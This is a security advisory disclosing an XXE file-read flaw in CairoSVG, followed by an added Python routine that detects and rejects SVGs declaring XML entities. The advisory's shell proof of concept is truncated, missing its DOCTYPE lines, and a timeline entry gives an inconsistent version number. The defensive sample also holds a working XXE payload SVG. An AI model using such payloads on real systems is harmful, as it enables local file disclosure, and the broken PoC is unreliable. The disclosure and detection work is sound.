-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-036
Product: CairoSVG
Vendor: Kozea
Affected Version(s): 1.0.20 and below
Tested Version(s): 1.0.20
Vulnerability Type: Improper Restriction of XML External Entity Reference ('XXE') (CWE-611)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2016-06-10
Solution Date: 2016-06-14
Public Disclosure: 2016-07-21
CVE Reference: Not assigned
Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

CairoSVG[2] is a tool for processing and converting SVG images. Because it
does not restrict external entity references when parsing XML input, it is
susceptible to XML External Entity (XXE) injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Using a crafted SVG image, an attacker can read arbitrary files that are
readable by the user running CairoSVG. If CairoSVG is used as part of a web
application, this may lead to remote file disclosure.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Run the following script in a Linux shell. The resulting PDF file
/tmp/issue.pdf will contain an image with the content of /etc/issue.

#!/bin/bash
cat << EOF > /tmp/evil.svg
]>
test &xxe; test
EOF
cairosvg -o /tmp/issue.pdf /tmp/evil.svg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to version 1.0.21 or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-04-27: Vulnerability discovered
2016-06-10: Vulnerability reported to vendor
2016-06-10: Release of CairoSVG version 10.0.21
2016-07-21: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-036
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-036.txt
[2] CairoSVG, Homepage
    http://cairosvg.org/
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Franz G. Jahn of the SySS GmbH.

E-Mail: franz.jahn (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc
Key ID: 0xD06A14DE
Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and
without warranty of any kind. Details of this security advisory may be
updated in order to provide as accurate information as possible. The latest
version of this security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJXjjVnAAoJENWmFJbQahTecUMP/iWXwXTy1H7e7A/lZfX+aaTl
UV5Cmt9OclwHZe4m6HY7ejuIFIvd+VGQd8cyk2jBw9Wf/HwNY4uRsl6W2uV+RqOg
f9ogiCbTFCk7Vb4ph409BEn52Abu9KApRLJnON6LxfnK3imP7xyerO3b+Cb+AT6d
5CLJVctpW6E9V099lKb7f//QXlQHWM1uSN/g3WgLWNMn8MTcvYBxkMew+WjNlWo2
U4Ppu8fE2kQz+K8h5l28UsTwEFYsNDcFj6ZiX8BvNIWCJ3f44S+CgDh8hbrXJ1MZ
JS7Ln5o0s90hD9/9HITMjrj5kj0Q/ujioNVnbhjZ6pQvr+sy3/9I3TI1/TgGM75/
NbHtXXUYwjkmKJmtGrb3ulzY2g1AVolC3T9e4ZAXX46xhUf0vFIxP2QcVat0HZ1Q
ikHTE7y1hhcqcUWljUv0EAASCMSWwA28/hHI6An91JrAA8obWzGDOp4ROc0U1qzc
V4Eco57dJntMHXhMk+R6amrm6Xj1I66CmyCDeWoV2RS7/rwSJOdC46JpxNVCkqQc
eaV/jqJjKdhG9v0aMHR/H86GIILTMVPAro/4d++SMB9TK2WUMCbQ4gtJs/O0J10l
60uoidYrco9s89urBex1slSsp0AjxuDWFOShhbz8M3g+mHXyiFMsde+eZk5xXSoR
ieApcQn78DUkd/N0ummV
=JTwr
-----END PGP SIGNATURE-----
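The vulnerability class described in the advisory (an SVG carrying a DOCTYPE
that declares an external entity, which the XML parser then resolves and
inlines into the rendered output) is what a defender needs to detect and
refuse before a file reaches a renderer such as CairoSVG. The following
example is added here and is not part of the SySS advisory or of CairoSVG
itself: it uses only Python's standard library expat bindings to scan an SVG
for DOCTYPE and entity declarations without resolving anything, and only
hands documents that declare no entities to ElementTree. The two sample
SVGs, the function names (`inspect_doctype`, `parse_svg_safely`), the
`UnsafeSVG` exception and the placeholder path in the malicious sample are
all constructed for this example.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


class UnsafeSVG(ValueError):
    """Raised when an SVG declares XML entities (the XXE vector)."""


def inspect_doctype(data: bytes) -> dict:
    """Scan an XML/SVG document with expat and report its DOCTYPE and any
    entity declarations, without ever fetching an external resource.

    Returns {"doctype": name_or_None, "entities": [...],
             "external_entities": [(name, system_id), ...]}.
    """
    report = {"doctype": None, "entities": [], "external_entities": []}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Called for every <!ENTITY ...> in the internal subset.
        report["entities"].append(name)
        if system_id is not None or public_id is not None:
            report["external_entities"].append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        # Returning 0 makes expat abort the parse instead of resolving
        # the reference, so the scanner can never read a local file.
        return 0

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        # The abort above (or an undefined entity) ends the parse, but the
        # declarations seen before that point have already been recorded.
        pass
    return report


def parse_svg_safely(data: bytes) -> ET.Element:
    """Parse an SVG only if it declares no entities at all.

    A plain DOCTYPE (e.g. the W3C SVG 1.1 public identifier written by many
    editors) is still allowed; ElementTree does not fetch external DTDs.
    """
    report = inspect_doctype(data)
    if report["entities"]:
        raise UnsafeSVG(
            "refusing SVG: DOCTYPE %r declares entities %r (external: %r)"
            % (report["doctype"], report["entities"], report["external_entities"])
        )
    return ET.fromstring(data)


# Constructed sample mirroring the advisory's PoC shape ("test &xxe; test");
# the file path is a placeholder, not a real target.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///path/to/local/file">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="20">
  <text x="0" y="15">test &xxe; test</text>
</svg>
"""

# Constructed benign sample with the DOCTYPE that common SVG editors emit.
BENIGN_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="20">
  <text x="0" y="15">test</text>
</svg>
"""


if __name__ == "__main__":
    print("malicious:", inspect_doctype(MALICIOUS_SVG))
    try:
        parse_svg_safely(MALICIOUS_SVG)
    except UnsafeSVG as exc:
        print("rejected:", exc)
    root = parse_svg_safely(BENIGN_SVG)
    print("benign parsed, root tag:", root.tag)
```

The check runs in a separate, handler-only expat pass before any real parse,
so the decision to reject is made from the declarations alone; the policy
here (no entities of any kind) is deliberately stricter than "no external
entities", since internal entities can still be used for entity-expansion
denial of service.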